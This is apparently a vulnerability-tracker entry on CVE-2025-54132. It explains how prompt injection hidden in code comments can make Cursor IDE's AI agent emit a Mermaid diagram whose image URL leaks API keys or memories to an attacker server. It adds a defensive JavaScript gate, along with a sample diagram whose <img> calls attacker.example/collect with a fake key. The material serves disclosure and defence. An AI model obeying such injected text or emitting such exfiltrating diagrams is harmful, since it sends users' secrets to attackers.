Cursor IDE: Arbitrary Data Exfiltration Via Mermaid (CVE-2025-54132)
Summary
Cursor IDE (an AI-powered code editor) renders Mermaid diagrams (a text-to-diagram markup for flowcharts and similar) that the AI agent emits during a session, and a diagram may reference an external image that Cursor fetches without asking the user. An attacker who can get text in front of the agent (a prompt injection hidden in code comments or other inputs the agent reads) can instruct it to emit a diagram whose image URL points at an attacker-controlled server and carries sensitive data, such as API keys or the user's stored memories, encoded in the URL. When the diagram is rendered, the image request delivers that data to the attacker with no user interaction.
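As an added example (not code from Cursor, Mermaid or the original post), the check a practitioner would want in front of the renderer: scan the Mermaid source the agent produced for external URLs, refuse to auto-render when any of them points off an allowlist, or rewrite them to an inert token so the diagram still draws but triggers no request. It flags every external URL rather than trying to enumerate each syntax Mermaid accepts for images, since all of them end in a fetch. The allowlisted host, the attacker host and the sample diagram are constructed for this example.

```javascript
// Added example, not code from Cursor, Mermaid or the Embrace The Red post.
// A pre-render gate for Mermaid source produced by an AI agent: find every
// external URL, block auto-rendering unless all are allowlisted, or neutralise them.
// ALLOWED_HOSTS and the sample diagram below are assumptions for this example.

const ALLOWED_HOSTS = new Set(["diagrams.corp.example"]);

// Absolute http(s) and protocol-relative URLs, wherever they appear in the
// diagram text (HTML <img> labels, image shapes, click directives, ...).
const URL_RE = /(?:https?:)?\/\/[^\s"'<>)\]]+/gi;

function parseUrl(raw) {
  try {
    return new URL(raw.startsWith("//") ? "https:" + raw : raw);
  } catch {
    return null; // not a well-formed URL, so nothing would be fetched
  }
}

// One finding per external URL: where it points and what data it carries.
function findExternalReferences(mermaidSource) {
  const findings = [];
  for (const match of mermaidSource.matchAll(URL_RE)) {
    const url = parseUrl(match[0]);
    if (!url) continue;
    findings.push({
      url: match[0],
      host: url.hostname,
      allowed: ALLOWED_HOSTS.has(url.hostname),
      // Query parameters are the usual carrier for exfiltrated data.
      query: Object.fromEntries(url.searchParams),
      // Data can also be stuffed into the path, so record how much is there.
      pathLength: url.pathname.length,
    });
  }
  return findings;
}

// Render automatically only when every external reference is allowlisted.
function shouldAutoRender(mermaidSource) {
  return findExternalReferences(mermaidSource).every((f) => f.allowed);
}

// Replace disallowed URLs with an inert token. The token contains no "//",
// so a second pass over the result finds nothing to fetch.
function neutralizeExternalReferences(mermaidSource) {
  return mermaidSource.replace(URL_RE, (raw) => {
    const url = parseUrl(raw);
    return url && ALLOWED_HOSTS.has(url.hostname) ? raw : "blocked:external-reference";
  });
}

// Constructed sample: the shape of a diagram an injected instruction could make
// the agent emit. attacker.example is a placeholder host; the key value is fake.
const SAMPLE_DIAGRAM = `graph TD
  A["Build"] --> B["Deploy"]
  B --> C["<img src='https://attacker.example/collect?k=sk-FAKE-1234'>"]
`;

console.log(findExternalReferences(SAMPLE_DIAGRAM));
console.log("auto-render:", shouldAutoRender(SAMPLE_DIAGRAM));
console.log(neutralizeExternalReferences(SAMPLE_DIAGRAM));
```

The gate belongs in front of whatever sandboxing the renderer itself applies, and the `query` field of each finding is worth logging: it records exactly what would have left the machine, which is what an incident responder needs when a blocked diagram turns up in an agent session.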
Classification
Affected Vendors
Related Issues
CVE-2024-27444: langchain_experimental (aka LangChain Experimental) in LangChain before 0.1.8 allows an attacker to bypass the CVE-2023-
CVE-2025-45150: Insecure permissions in LangChain-ChatGLM-Webui commit ef829 allows attackers to arbitrarily view and download sensitive
Original source: https://embracethered.com/blog/posts/2025/cursor-data-exfiltration-with-mermaid/
First tracked: February 12, 2026 at 02:20 PM
Classified by LLM (prompt v3) · confidence: 92%